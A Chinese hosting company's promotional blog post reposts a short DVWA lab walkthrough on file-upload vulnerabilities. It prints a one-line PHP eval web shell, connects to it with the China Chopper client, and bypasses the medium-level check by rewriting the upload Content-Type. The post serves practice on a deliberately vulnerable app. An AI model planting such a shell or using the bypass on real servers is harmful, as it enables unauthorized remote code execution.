今天就跟大家聊聊有關(guān)大數(shù)據(jù)中如何進(jìn)行文件上傳漏洞的分析，可能很多人都不太了解，為了讓大家更加了解，小編給大家總結(jié)了以下內(nèi)容，希望大家根據(jù)這篇文章可以有所收獲。

創(chuàng)新互聯(lián)公司專(zhuān)注骨干網(wǎng)絡(luò)服務(wù)器租用十多年，服務(wù)更有保障！服務(wù)器租用，成都服務(wù)器托管 成都服務(wù)器租用，成都服務(wù)器托管，骨干網(wǎng)絡(luò)帶寬，享受低延遲，高速訪問(wèn)。靈活、實(shí)現(xiàn)低成本的共享或公網(wǎng)數(shù)據(jù)中心高速帶寬的專(zhuān)屬高性能服務(wù)器。

一、環(huán)境：dvwa

二、選擇Upload，low級(jí)別

1、上傳1.php文件和1.jpg文件都沒(méi)問(wèn)題

PHP文件內(nèi)容為：

<?php @eval($_POST["abc"]);?>

2、訪問(wèn)我們上傳的文件

http://192.168.152.188/dvwa/hackable/uploads/1.jpg

可以看到圖片

http://192.168.152.188/dvwa/hackable/uploads/1.php

什么都看不到

3、用菜刀鏈接1.php文件，點(diǎn)擊添加

4、雙擊鏈接進(jìn)入

三、選擇Upload，medium級(jí)別

1、上傳2.php文件和2.jpg文件，發(fā)現(xiàn)不能上傳2.php

2、點(diǎn)擊view source

3、這里限制了上傳類(lèi)型，抓包修改上傳類(lèi)型

4、我們將text/plain修改為image/jpeg，成功上傳

5、用菜刀鏈接一下

四、選擇Upload，high級(jí)別

看完上述內(nèi)容，你們對(duì)大數(shù)據(jù)中如何進(jìn)行文件上傳漏洞的分析有進(jìn)一步的了解嗎？如果還想了解更多知識(shí)或者相關(guān)內(nèi)容，請(qǐng)關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道，感謝大家的支持。

分享文章：大數(shù)據(jù)中如何進(jìn)行文件上傳漏洞的分析
本文鏈接：http://jinyejixie.com/article30/pggdpo.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供App開(kāi)發(fā)、網(wǎng)站內(nèi)鏈、定制開(kāi)發(fā)、網(wǎng)站策劃、品牌網(wǎng)站設(shè)計(jì)、品牌網(wǎng)站建設(shè)

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來(lái)源： 創(chuàng)新互聯(lián)